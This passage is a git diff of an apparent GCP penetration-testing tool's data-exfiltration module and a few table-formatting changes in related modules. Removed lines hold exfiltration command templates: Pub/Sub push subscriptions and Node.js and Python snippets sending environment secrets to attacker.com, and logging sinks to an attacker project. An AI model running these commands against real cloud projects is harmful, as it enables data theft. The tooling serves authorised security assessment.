GCP_DATAEXFILTRATION_MODULE_NAME) + return + } + + cache := gcpinternal.NewAttackPathCache() + + // Populate cache with paths from all scopes + var pathInfos []gcpinternal.AttackPathInfo + for _, path := range fullResult.AllPaths { + pathInfos = append(pathInfos, gcpinternal.AttackPathInfo{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + Method: path.Method, + PathType: gcpinternal.AttackPathType(path.PathType), + Category: path.Category, + RiskLevel: path.RiskLevel, + Target: path.TargetResource, + Permissions: path.Permissions, + ScopeType: path.ScopeType, + ScopeID: path.ScopeID, + }) + } + cache.PopulateFromPaths(pathInfos) + cache.SetRawData(fullResult) + + // Save to disk + err = gcpinternal.SaveAttackPathCacheToFile(cache, m.ProjectIDs, m.OutputDirectory, m.Account, "1.0") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not save attack path cache: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + } else { + privesc, exfil, lateral := cache.GetStats() + logger.InfoM(fmt.Sprintf("Saved attack path cache to disk (%d privesc, %d exfil, %d lateral)", + privesc, exfil, lateral), GCP_DATAEXFILTRATION_MODULE_NAME) + } +} + // analyzeOrgFolderExfilPaths analyzes organization and folder level IAM for exfil permissions func (m *DataExfiltrationModule) analyzeOrgFolderExfilPaths(ctx context.Context, logger internal.Logger) { attackSvc := attackpathservice.New() @@ -276,9 +338,16 @@ func (m *DataExfiltrationModule) analyzeOrgFolderExfilPaths(ctx context.Context, orgPaths[i].RiskLevel = "CRITICAL" // Org-level is critical orgPaths[i].PathType = "exfil" } - // Store under a special "organization" key + // Distribute org-level paths to ALL enumerated projects + // (org-level access affects all projects in the org) m.mu.Lock() - m.ProjectAttackPaths["organization"] = append(m.ProjectAttackPaths["organization"], orgPaths...) + for _, projectID := range m.ProjectIDs { + for _, path := range orgPaths { + pathCopy := path + pathCopy.ProjectID = projectID + m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], pathCopy) + } + } m.mu.Unlock() } @@ -300,9 +369,17 @@ func (m *DataExfiltrationModule) analyzeOrgFolderExfilPaths(ctx context.Context, folderPaths[i].RiskLevel = "CRITICAL" // Folder-level is critical folderPaths[i].PathType = "exfil" } - // Store under a special "folder" key + // Distribute folder-level paths to ALL enumerated projects + // (folder-level access affects all projects in the folder) + // TODO: Could be smarter and only distribute to projects in the folder m.mu.Lock() - m.ProjectAttackPaths["folder"] = append(m.ProjectAttackPaths["folder"], folderPaths...) + for _, projectID := range m.ProjectIDs { + for _, path := range folderPaths { + pathCopy := path + pathCopy.ProjectID = projectID + m.ProjectAttackPaths[projectID] = append(m.ProjectAttackPaths[projectID], pathCopy) + } + } m.mu.Unlock() } } @@ -457,189 +534,6 @@ func (m *DataExfiltrationModule) isOrgPolicyProtected(projectID string) bool { return false } -// generateMissingHardeningRecommendations creates a list of hardening recommendations for each project -func (m *DataExfiltrationModule) generateMissingHardeningRecommendations() []MissingHardening { - var recommendations []MissingHardening - - for _, projectID := range m.ProjectIDs { - protection, ok := m.orgPolicyProtection[projectID] - if !ok { - // No protection data available - recommend all controls - protection = &OrgPolicyProtection{ProjectID: projectID} - } - - // Storage protections - if !protection.PublicAccessPrevention { - recommendations = append(recommendations, MissingHardening{ - ProjectID: projectID, - Category: "Storage", - Control: "storage.publicAccessPrevention", - Description: "Prevents GCS buckets from being made public via IAM policies", - Recommendation: `# Enable via org policy (recommended at org/folder level) -gcloud org-policies set-policy --project=PROJECT_ID policy.yaml - -# policy.yaml contents: -# name: projects/PROJECT_ID/policies/storage.publicAccessPrevention -# spec: -# rules: -# - enforce: true - -# Or enable per-bucket: -gcloud storage buckets update gs://BUCKET_NAME --public-access-prevention`, - }) - } - - // IAM protections - if !protection.DomainRestriction { - recommendations = append(recommendations, MissingHardening{ - ProjectID: projectID, - Category: "IAM", - Control: "iam.allowedPolicyMemberDomains", - Description: "Restricts IAM policy members to specific domains only (prevents allUsers/allAuthenticatedUsers)", - Recommendation: `# Enable via org policy (recommended at org/folder level) -gcloud org-policies set-policy --project=PROJECT_ID policy.yaml - -# policy.yaml contents: -# name: projects/PROJECT_ID/policies/iam.allowedPolicyMemberDomains -# spec: -# rules: -# - values: -# allowedValues: -# - C0xxxxxxx # Your Cloud Identity/Workspace customer ID -# - is:example.com # Or domain restriction`, - }) - } - - // Cloud SQL protections - if !protection.SQLPublicIPRestriction { - recommendations = append(recommendations, MissingHardening{ - ProjectID: projectID, - Category: "Cloud SQL", - Control: "sql.restrictPublicIp", - Description: "Prevents Cloud SQL instances from having public IP addresses", - Recommendation: `# Enable via org policy -gcloud org-policies set-policy --project=PROJECT_ID policy.yaml - -# policy.yaml contents: -# name: projects/PROJECT_ID/policies/sql.restrictPublicIp -# spec: -# rules: -# - enforce: true`, - }) - } - - // Cloud Functions protections - if !protection.CloudFunctionsVPCConnector { - recommendations = append(recommendations, MissingHardening{ - ProjectID: projectID, - Category: "Cloud Functions", - Control: "cloudfunctions.requireVPCConnector", - Description: "Requires Cloud Functions to use VPC connector for egress (prevents direct internet access)", - Recommendation: `# Enable via org policy -gcloud org-policies set-policy --project=PROJECT_ID policy.yaml - -# policy.yaml contents: -# name: projects/PROJECT_ID/policies/cloudfunctions.requireVPCConnector -# spec: -# rules: -# - enforce: true - -# Note: Requires VPC connector to be configured in the VPC`, - }) - } - - // Cloud Run protections - if !protection.CloudRunIngressRestriction { - recommendations = append(recommendations, MissingHardening{ - ProjectID: projectID, - Category: "Cloud Run", - Control: "run.allowedIngress", - Description: "Restricts Cloud Run ingress to internal traffic only (prevents public access)", - Recommendation: `# Enable via org policy -gcloud org-policies set-policy --project=PROJECT_ID policy.yaml - -# policy.yaml contents: -# name: projects/PROJECT_ID/policies/run.allowedIngress -# spec: -# rules: -# - values: -# allowedValues: -# - internal # Only allow internal traffic -# # Or: internal-and-cloud-load-balancing - -# Per-service setting: -gcloud run services update SERVICE --ingress=internal --region=REGION`, - }) - } - - // BigQuery protections - AWS - if !protection.DisableBQOmniAWS { - recommendations = append(recommendations, MissingHardening{ - ProjectID: projectID, - Category: "BigQuery", - Control: "bigquery.disableBQOmniAWS", - Description: "Prevents BigQuery Omni connections to AWS (blocks cross-cloud data access)", - Recommendation: `# Enable via org policy -gcloud org-policies set-policy --project=PROJECT_ID policy.yaml - -# policy.yaml contents: -# name: projects/PROJECT_ID/policies/bigquery.disableBQOmniAWS -# spec: -# rules: -# - enforce: true`, - }) - } - - // BigQuery protections - Azure - if !protection.DisableBQOmniAzure { - recommendations = append(recommendations, MissingHardening{ - ProjectID: projectID, - Category: "BigQuery", - Control: "bigquery.disableBQOmniAzure", - Description: "Prevents BigQuery Omni connections to Azure (blocks cross-cloud data access)", - Recommendation: `# Enable via org policy -gcloud org-policies set-policy --project=PROJECT_ID policy.yaml - -# policy.yaml contents: -# name: projects/PROJECT_ID/policies/bigquery.disableBQOmniAzure -# spec: -# rules: -# - enforce: true`, - }) - } - - // Check VPC-SC protection status - if !m.vpcscProtectedProj[projectID] { - recommendations = append(recommendations, MissingHardening{ - ProjectID: projectID, - Category: "VPC Service Controls", - Control: "VPC-SC Perimeter", - Description: "VPC Service Controls create a security perimeter that prevents data exfiltration from GCP APIs", - Recommendation: `# VPC-SC requires Access Context Manager at organization level - -# 1. Create an access policy (org-level, one-time) -gcloud access-context-manager policies create --organization=ORG_ID --title="Policy" - -# 2. Create a service perimeter -gcloud access-context-manager perimeters create NAME \ - --title="Data Protection Perimeter" \ - --resources=projects/PROJECT_NUMBER \ - --restricted-services=storage.googleapis.com,bigquery.googleapis.com \ - --policy=POLICY_ID - -# Restricted services commonly include: -# - storage.googleapis.com (GCS) -# - bigquery.googleapis.com (BigQuery) -# - pubsub.googleapis.com (Pub/Sub) -# - logging.googleapis.com (Cloud Logging) -# - secretmanager.googleapis.com (Secret Manager)`, - }) - } - } - - return recommendations -} - // ------------------------------ // Project Processor // ------------------------------ @@ -663,7 +557,7 @@ func (m *DataExfiltrationModule) generatePlaybook() *internal.LootFile { } } -// collectAllAttackPaths converts ExfiltrationPath, PotentialVector, and PublicExport to AttackPath +// collectAllAttackPaths converts ExfiltrationPath and PublicExport to AttackPath func (m *DataExfiltrationModule) collectAllAttackPaths() []attackpathservice.AttackPath { var allPaths []attackpathservice.AttackPath @@ -674,13 +568,6 @@ func (m *DataExfiltrationModule) collectAllAttackPaths() []attackpathservice.Att } } - // Convert PotentialVectors - for _, vectors := range m.ProjectPotentialVectors { - for _, v := range vectors { - allPaths = append(allPaths, m.potentialVectorToAttackPath(v)) - } - } - // Convert PublicExports (bucket specific public exports) for _, exports := range m.ProjectPublicExports { for _, e := range exports { @@ -718,24 +605,6 @@ func (m *DataExfiltrationModule) exfiltrationPathToAttackPath(p ExfiltrationPath } } -// potentialVectorToAttackPath converts PotentialVector to AttackPath -func (m *DataExfiltrationModule) potentialVectorToAttackPath(v PotentialVector) attackpathservice.AttackPath { - return attackpathservice.AttackPath{ - PathType: "exfil", - Category: "Potential Vector", - Method: v.VectorType, - Principal: "N/A (Potential)", - PrincipalType: "resource", - TargetResource: v.ResourceName, - ProjectID: v.ProjectID, - ScopeType: "project", - ScopeID: v.ProjectID, - ScopeName: v.ProjectID, - Description: v.Destination, - Permissions: []string{}, - ExploitCommand: v.ExploitCommand, - } -} // publicExportToAttackPath converts PublicExport to AttackPath func (m *DataExfiltrationModule) publicExportToAttackPath(e PublicExport) attackpathservice.AttackPath { @@ -833,26 +702,9 @@ func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID s // 9. Find Storage Transfer jobs to external destinations m.findStorageTransferJobs(ctx, projectID, logger) - // === POTENTIAL EXFILTRATION VECTORS === - - // 10. Check for BigQuery export capability - m.checkBigQueryExportCapability(ctx, projectID, logger) - - // 11. Check for Pub/Sub subscription capability - m.checkPubSubCapability(ctx, projectID, logger) - - // 12. Check for Cloud Function capability - m.checkCloudFunctionCapability(ctx, projectID, logger) - - // 13. Check for Cloud Run capability - m.checkCloudRunCapability(ctx, projectID, logger) - - // 14. Check for Logging sink capability - m.checkLoggingSinkCapability(ctx, projectID, logger) - // === PERMISSION-BASED EXFILTRATION CAPABILITIES === - // 15. Check IAM for principals with data exfiltration permissions + // 10. Check IAM for principals with data exfiltration permissions m.findPermissionBasedExfilPaths(ctx, projectID, logger) } @@ -1404,259 +1256,15 @@ func (m *DataExfiltrationModule) findStorageTransferJobs(ctx context.Context, pr } } -// ------------------------------ -// Potential Vector Checks -// ------------------------------ - -// checkBigQueryExportCapability checks if BigQuery datasets exist (can export to GCS/external) -func (m *DataExfiltrationModule) checkBigQueryExportCapability(ctx context.Context, projectID string, logger internal.Logger) { - bq := bigqueryservice.New() - datasets, err := bq.BigqueryDatasets(projectID) - if err != nil { - return // Silently skip - API may not be enabled - } - - if len(datasets) > 0 { - vector := PotentialVector{ - VectorType: "BigQuery Export", - ResourceName: "*", - ProjectID: projectID, - Description: "BigQuery can export data to GCS bucket or external table", - Destination: "GCS bucket or external table", - ExploitCommand: fmt.Sprintf(`# List all datasets in project -bq ls --project_id=%s - -# List tables in a dataset -bq ls %s:DATASET_NAME - -# Export table to GCS (requires storage.objects.create on bucket) -bq extract --destination_format=CSV '%s:DATASET.TABLE' gs://YOUR_BUCKET/export.csv - -# Export to external table (federated query) -bq query --use_legacy_sql=false 'SELECT * FROM EXTERNAL_QUERY("connection_id", "SELECT * FROM table")' - -# Create external table pointing to GCS -bq mk --external_table_definition=gs://bucket/file.csv@CSV DATASET.external_table`, projectID, projectID, projectID), - } - - m.mu.Lock() - m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) - m.addPotentialVectorToLoot(projectID, vector) - m.mu.Unlock() - } -} - -// checkPubSubCapability checks if Pub/Sub topics/subscriptions exist -func (m *DataExfiltrationModule) checkPubSubCapability(ctx context.Context, projectID string, logger internal.Logger) { - ps := pubsubservice.New() - subs, err := ps.Subscriptions(projectID) - if err != nil { - return // Silently skip - } - - if len(subs) > 0 { - vector := PotentialVector{ - VectorType: "Pub/Sub Subscription", - ResourceName: "*", - ProjectID: projectID, - Description: "Pub/Sub can push messages to external HTTP endpoint", - Destination: "External HTTP endpoint", - ExploitCommand: fmt.Sprintf(`# List all subscriptions -gcloud pubsub subscriptions list --project=%s - -# Create a push subscription to external endpoint (requires pubsub.subscriptions.create) -gcloud pubsub subscriptions create exfil-sub \ - --topic=TOPIC_NAME \ - --push-endpoint=https://attacker.com/collect \ - --project=%s - -# Pull messages from existing subscription (requires pubsub.subscriptions.consume) -gcloud pubsub subscriptions pull SUB_NAME --auto-ack --limit=100 --project=%s - -# Modify existing subscription to push to external endpoint -gcloud pubsub subscriptions modify-push-config SUB_NAME \ - --push-endpoint=https://attacker.com/collect \ - --project=%s`, projectID, projectID, projectID, projectID), - } - - m.mu.Lock() - m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) - m.addPotentialVectorToLoot(projectID, vector) - m.mu.Unlock() - } -} - -// checkCloudFunctionCapability checks if Cloud Functions exist -func (m *DataExfiltrationModule) checkCloudFunctionCapability(ctx context.Context, projectID string, logger internal.Logger) { - functionsService, err := cloudfunctions.NewService(ctx) - if err != nil { - return - } - - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - resp, err := functionsService.Projects.Locations.Functions.List(parent).Do() - if err != nil { - return // Silently skip - } - - if len(resp.Functions) > 0 { - vector := PotentialVector{ - VectorType: "Cloud Function", - ResourceName: "*", - ProjectID: projectID, - Description: "Cloud Functions can make outbound HTTP requests to external endpoints", - Destination: "External HTTP endpoint", - ExploitCommand: fmt.Sprintf(`# List all Cloud Functions -gcloud functions list --project=%s - -# If you can update function code, add exfiltration logic: -# - Read secrets/data from project resources -# - Send HTTP POST to external endpoint - -# Example: Deploy function that exfiltrates data -# function code (index.js): -# const https = require('https'); -# exports.exfil = (req, res) => { -# const data = JSON.stringify({secrets: process.env}); -# const options = {hostname: 'attacker.com', path: '/collect', method: 'POST'}; -# https.request(options).write(data); -# res.send('ok'); -# }; - -# Invoke a function (if publicly accessible or you have invoker role) -gcloud functions call FUNCTION_NAME --project=%s - -# View function source -gcloud functions describe FUNCTION_NAME --project=%s`, projectID, projectID, projectID), - } - - m.mu.Lock() - m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) - m.addPotentialVectorToLoot(projectID, vector) - m.mu.Unlock() - } -} - -// checkCloudRunCapability checks if Cloud Run services exist -func (m *DataExfiltrationModule) checkCloudRunCapability(ctx context.Context, projectID string, logger internal.Logger) { - runService, err := run.NewService(ctx) - if err != nil { - return - } - - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - resp, err := runService.Projects.Locations.Services.List(parent).Do() - if err != nil { - return // Silently skip - } - - if len(resp.Items) > 0 { - vector := PotentialVector{ - VectorType: "Cloud Run", - ResourceName: "*", - ProjectID: projectID, - Description: "Cloud Run services can make outbound HTTP requests to external endpoints", - Destination: "External HTTP endpoint", - ExploitCommand: fmt.Sprintf(`# List all Cloud Run services -gcloud run services list --project=%s - -# If you can update service, add exfiltration logic in container -# Cloud Run containers have full network egress by default - -# Example: Deploy container that exfiltrates environment/metadata -# Dockerfile: -# FROM python:3.9-slim -# COPY exfil.py . -# CMD ["python", "exfil.py"] - -# exfil.py: -# import os, requests -# requests.post('https://attacker.com/collect', json={ -# 'env': dict(os.environ), -# 'metadata': requests.get('http://metadata.google.internal/...').text -# }) - -# View service details -gcloud run services describe SERVICE_NAME --region=REGION --project=%s - -# Invoke service (if you have invoker role) -curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" SERVICE_URL`, projectID, projectID), - } - - m.mu.Lock() - m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) - m.addPotentialVectorToLoot(projectID, vector) - m.mu.Unlock() - } -} - -// checkLoggingSinkCapability checks if logging sinks can be created -func (m *DataExfiltrationModule) checkLoggingSinkCapability(ctx context.Context, projectID string, logger internal.Logger) { - ls := loggingservice.New() - sinks, err := ls.Sinks(projectID) - if err != nil { - return // Silently skip - } - - // If we can list sinks, we might be able to create them - // Also check if there's an existing sink we could modify - hasCrossProjectSink := false - for _, sink := range sinks { - if sink.IsCrossProject { - hasCrossProjectSink = true - break - } - } - - // Add as potential vector if logging API is accessible - vector := PotentialVector{ - VectorType: "Logging Sink", - ResourceName: "*", - ProjectID: projectID, - Description: "Logs can be exported to external project or Pub/Sub topic", - Destination: "External project or Pub/Sub topic", - ExploitCommand: fmt.Sprintf(`# List existing logging sinks -gcloud logging sinks list --project=%s - -# Create a sink to export logs to attacker-controlled destination -# (requires logging.sinks.create permission) - -# Export to Pub/Sub topic in another project -gcloud logging sinks create exfil-sink \ - pubsub.googleapis.com/projects/ATTACKER_PROJECT/topics/stolen-logs \ - --log-filter='resource.type="gce_instance"' \ - --project=%s - -# Export to BigQuery in another project -gcloud logging sinks create exfil-sink \ - bigquery.googleapis.com/projects/ATTACKER_PROJECT/datasets/stolen_logs \ - --log-filter='resource.type="gce_instance"' \ - --project=%s - -# Export to GCS bucket -gcloud logging sinks create exfil-sink \ - storage.googleapis.com/attacker-bucket \ - --log-filter='resource.type="gce_instance"' \ - --project=%s - -# Modify existing sink destination (requires logging.sinks.update) -gcloud logging sinks update SINK_NAME \ - --destination=pubsub.googleapis.com/projects/ATTACKER_PROJECT/topics/stolen \ - --project=%s`, projectID, projectID, projectID, projectID, projectID), - } - - // Only add if there's evidence logging is actively used or we found sinks - if len(sinks) > 0 || hasCrossProjectSink { - m.mu.Lock() - m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) - m.addPotentialVectorToLoot(projectID, vector) - m.mu.Unlock() - } -} // findPermissionBasedExfilPaths identifies principals with data exfiltration permissions // This uses the centralized attackpathService for project and resource-level analysis func (m *DataExfiltrationModule) findPermissionBasedExfilPaths(ctx context.Context, projectID string, logger internal.Logger) { + // Skip if we already loaded attack paths from cache + if m.usedAttackPathCache { + return + } + // Use attackpathService for project-level analysis attackSvc := attackpathservice.New() @@ -1717,69 +1325,6 @@ func (m *DataExfiltrationModule) addExfiltrationPathToLoot(projectID string, pat lootFile.Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) } -func (m *DataExfiltrationModule) addPotentialVectorToLoot(projectID string, vector PotentialVector) { - if vector.ExploitCommand == "" { - return - } - - lootFile := m.LootMap[projectID]["data-exfiltration-commands"] - if lootFile == nil { - return - } - - lootFile.Contents += fmt.Sprintf( - "#############################################\n"+ - "## [POTENTIAL] %s\n"+ - "## Project: %s\n"+ - "## Description: %s\n"+ - "## Destination: %s\n"+ - "#############################################\n", - vector.VectorType, - vector.ProjectID, - vector.Description, - vector.Destination, - ) - - lootFile.Contents += fmt.Sprintf("%s\n\n", vector.ExploitCommand) -} - -func (m *DataExfiltrationModule) addHardeningRecommendationsToLoot(projectID string, recommendations []MissingHardening) { - if len(recommendations) == 0 { - return - } - - // Initialize hardening loot file if not exists - if m.LootMap[projectID]["data-exfiltration-hardening"] == nil { - m.LootMap[projectID]["data-exfiltration-hardening"] = &internal.LootFile{ - Name: "data-exfiltration-hardening", - Contents: "# Data Exfiltration Prevention - Hardening Recommendations\n# Generated by CloudFox\n# These controls help prevent data exfiltration from GCP projects\n\n", - } - } - - lootFile := m.LootMap[projectID]["data-exfiltration-hardening"] - - lootFile.Contents += fmt.Sprintf( - "#############################################\n"+ - "## PROJECT: %s (%s)\n"+ - "## Missing %d security control(s)\n"+ - "#############################################\n\n", - projectID, - m.GetProjectName(projectID), - len(recommendations), - ) - - for _, rec := range recommendations { - lootFile.Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Description: %s\n"+ - "#############################################\n", - rec.Category, - rec.Control, - rec.Description, - ) - lootFile.Contents += fmt.Sprintf("%s\n\n", rec.Recommendation) - } -} // ------------------------------ // Output Generation @@ -1795,8 +1340,7 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna func (m *DataExfiltrationModule) getMisconfigHeader() []string { return []string{ - "Project ID", - "Project Name", + "Project", "Resource", "Type", "Destination", @@ -1805,25 +1349,17 @@ func (m *DataExfiltrationModule) getMisconfigHeader() []string { } } -func (m *DataExfiltrationModule) getVectorHeader() []string { +func (m *DataExfiltrationModule) getAttackPathsHeader() []string { return []string{ - "Project ID", - "Project Name", - "Resource", - "Type", - "Destination", - "Public", - "Size", - } -} - -func (m *DataExfiltrationModule) getHardeningHeader() []string { - return []string{ - "Project ID", - "Project Name", + "Project", + "Source", + "Principal Type", + "Principal", + "Method", + "Target Resource", "Category", - "Control", - "Description", + "Binding Scope", + "Permissions", } } @@ -1851,7 +1387,6 @@ func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, expo } body = append(body, []string{ - p.ProjectID, m.GetProjectName(p.ProjectID), p.ResourceName, p.PathType, @@ -1864,7 +1399,6 @@ func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, expo // Add any remaining public exports not already covered for _, e := range publicResources { body = append(body, []string{ - e.ProjectID, m.GetProjectName(e.ProjectID), e.ResourceName, e.ResourceType, @@ -1877,42 +1411,67 @@ func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, expo return body } -func (m *DataExfiltrationModule) vectorsToTableBody(vectors []PotentialVector) [][]string { +func (m *DataExfiltrationModule) attackPathsToTableBody(paths []attackpathservice.AttackPath) [][]string { var body [][]string - for _, v := range vectors { - body = append(body, []string{ - v.ProjectID, - m.GetProjectName(v.ProjectID), - v.ResourceName, - v.VectorType, - v.Destination, - "No", - "-", - }) - } - return body -} + for _, p := range paths { + // Format source (where permission was granted) + source := p.ScopeName + if source == "" { + source = p.ScopeID + } + if p.ScopeType == "organization" { + source = "org:" + source + } else if p.ScopeType == "folder" { + source = "folder:" + source + } else if p.ScopeType == "resource" { + source = "resource" + } else { + source = "project" + } + + // Format target resource + targetResource := p.TargetResource + if targetResource == "" || targetResource == "*" { + targetResource = "*" + } + + // Format permissions + permissions := strings.Join(p.Permissions, ", ") + if permissions == "" { + permissions = "-" + } + + // Format binding scope (where the IAM binding is defined) + bindingScope := "Project" + if p.ScopeType == "organization" { + bindingScope = "Organization" + } else if p.ScopeType == "folder" { + bindingScope = "Folder" + } else if p.ScopeType == "resource" { + bindingScope = "Resource" + } -func (m *DataExfiltrationModule) hardeningToTableBody(recs []MissingHardening) [][]string { - var body [][]string - for _, h := range recs { body = append(body, []string{ - h.ProjectID, - m.GetProjectName(h.ProjectID), - h.Category, - h.Control, - h.Description, + m.GetProjectName(p.ProjectID), + source, + p.PrincipalType, + p.Principal, + p.Method, + targetResource, + p.Category, + bindingScope, + permissions, }) } return body } -func (m *DataExfiltrationModule) buildTablesForProject(projectID string, hardeningRecs []MissingHardening) []internal.TableFile { +func (m *DataExfiltrationModule) buildTablesForProject(projectID string) []internal.TableFile { var tableFiles []internal.TableFile paths := m.ProjectExfiltrationPaths[projectID] exports := m.ProjectPublicExports[projectID] - vectors := m.ProjectPotentialVectors[projectID] + attackPaths := m.ProjectAttackPaths[projectID] if len(paths) > 0 || len(exports) > 0 { body := m.pathsToTableBody(paths, exports) @@ -1925,27 +1484,11 @@ func (m *DataExfiltrationModule) buildTablesForProject(projectID string, hardeni } } - if len(vectors) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "data-exfiltration-vectors", - Header: m.getVectorHeader(), - Body: m.vectorsToTableBody(vectors), - }) - } - - // Filter hardening for this project - var projectHardening []MissingHardening - for _, h := range hardeningRecs { - if h.ProjectID == projectID { - projectHardening = append(projectHardening, h) - } - } - - if len(projectHardening) > 0 { + if len(attackPaths) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "data-exfiltration-hardening", - Header: m.getHardeningHeader(), - Body: m.hardeningToTableBody(projectHardening), + Name: "data-exfiltration", + Header: m.getAttackPathsHeader(), + Body: m.attackPathsToTableBody(attackPaths), }) } @@ -1958,21 +1501,16 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - hardeningRecs := m.generateMissingHardeningRecommendations() - // Collect all project IDs that have data projectIDs := make(map[string]bool) for projectID := range m.ProjectExfiltrationPaths { projectIDs[projectID] = true } - for projectID := range m.ProjectPotentialVectors { - projectIDs[projectID] = true - } for projectID := range m.ProjectPublicExports { projectIDs[projectID] = true } - for _, h := range hardeningRecs { - projectIDs[h.ProjectID] = true + for projectID := range m.ProjectAttackPaths { + projectIDs[projectID] = true } // Generate playbook once for all projects @@ -1983,16 +1521,7 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo // Ensure loot is initialized m.initializeLootForProject(projectID) - // Filter hardening recommendations for this project and add to loot - var projectHardening []MissingHardening - for _, h := range hardeningRecs { - if h.ProjectID == projectID { - projectHardening = append(projectHardening, h) - } - } - m.addHardeningRecommendationsToLoot(projectID, projectHardening) - - tableFiles := m.buildTablesForProject(projectID, hardeningRecs) + tableFiles := m.buildTablesForProject(projectID) var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { @@ -2022,20 +1551,12 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { allPaths := m.getAllExfiltrationPaths() - allVectors := m.getAllPotentialVectors() allExports := m.getAllPublicExports() - hardeningRecs := m.generateMissingHardeningRecommendations() + allAttackPaths := m.getAllAttackPaths() - // Add hardening recommendations to loot files + // Initialize loot for projects for _, projectID := range m.ProjectIDs { m.initializeLootForProject(projectID) - var projectHardening []MissingHardening - for _, h := range hardeningRecs { - if h.ProjectID == projectID { - projectHardening = append(projectHardening, h) - } - } - m.addHardeningRecommendationsToLoot(projectID, projectHardening) } // Build tables @@ -2050,19 +1571,11 @@ func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger int }) } - if len(allVectors) > 0 { - tables = append(tables, internal.TableFile{ - Name: "data-exfiltration-vectors", - Header: m.getVectorHeader(), - Body: m.vectorsToTableBody(allVectors), - }) - } - - if len(hardeningRecs) > 0 { + if len(allAttackPaths) > 0 { tables = append(tables, internal.TableFile{ - Name: "data-exfiltration-hardening", - Header: m.getHardeningHeader(), - Body: m.hardeningToTableBody(hardeningRecs), + Name: "data-exfiltration", + Header: m.getAttackPathsHeader(), + Body: m.attackPathsToTableBody(allAttackPaths), }) } diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index 025abe3b..caf32276 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -176,7 +176,7 @@ func (m *DataflowModule) getTableHeader() []string { "State", "Location", "Service Account", - "Attack Paths", + "SA Attack Paths", "Public IPs", "Workers", } @@ -191,7 +191,7 @@ func (m *DataflowModule) jobsToTableBody(jobs []dataflowservice.JobInfo) [][]str } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if job.ServiceAccount != "" { attackPaths = m.AttackPathCache.GetAttackSummary(job.ServiceAccount) diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index 30997711..a6f981cd 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -176,8 +176,7 @@ func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger func (m *DataprocModule) getTableHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Name", "Region", "State", @@ -185,11 +184,11 @@ func (m *DataprocModule) getTableHeader() []string { "Master Instances", "Workers", "Service Account", - "Attack Paths", + "SA Attack Paths", "Public IPs", "Kerberos", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -202,7 +201,7 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "(default)" && sa != "" { attackPaths = m.AttackPathCache.GetAttackSummary(sa) @@ -225,7 +224,6 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI for _, binding := range cluster.IAMBindings { body = append(body, []string{ m.GetProjectName(cluster.ProjectID), - cluster.ProjectID, cluster.Name, cluster.Region, cluster.State, @@ -244,7 +242,6 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI // Cluster has no IAM bindings - single row body = append(body, []string{ m.GetProjectName(cluster.ProjectID), - cluster.ProjectID, cluster.Name, cluster.Region, cluster.State, diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go index f19406d5..d720f625 100644 --- a/gcp/commands/dns.go +++ b/gcp/commands/dns.go @@ -260,8 +260,7 @@ func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { // getZonesHeader returns the header for the zones table func (m *DNSModule) getZonesHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Zone Name", "DNS Name", "Visibility", @@ -269,8 +268,8 @@ func (m *DNSModule) getZonesHeader() []string { "Security", "Networks/Peering", "Forwarding", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -324,13 +323,13 @@ func (m *DNSModule) zonesToTableBody(zones []DNSService.ZoneInfo) [][]string { if len(zone.IAMBindings) > 0 { for _, binding := range zone.IAMBindings { body = append(body, []string{ - m.GetProjectName(zone.ProjectID), zone.ProjectID, zone.Name, zone.DNSName, + m.GetProjectName(zone.ProjectID), zone.Name, zone.DNSName, zone.Visibility, dnssec, security, networkInfo, forwarding, binding.Role, binding.Member, }) } } else { body = append(body, []string{ - m.GetProjectName(zone.ProjectID), zone.ProjectID, 